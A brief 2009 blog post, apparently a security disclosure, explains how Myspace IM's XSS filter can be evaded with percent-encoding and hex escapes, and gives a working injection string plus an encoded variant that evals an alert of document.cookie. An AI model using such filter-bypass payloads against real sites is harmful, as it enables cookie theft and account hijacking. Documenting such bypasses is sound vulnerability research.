Sunday, August 16, 2009

Bypassing Myspace IM XSS Filters

The filtering Myspace IM uses is rather aggressive. Regardless of context, "document." is rewritten to "document·" and "eval()" to "..)". Percent-encoding and JavaScript hex escape sequences circumvent this, because the filter matches the literal keywords and never sees the decoded form.

The vulnerability (only works when logged in):

"};alert(0);var x={"":"

The vulnerability re-encoded to bypass the IM filters:

};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22

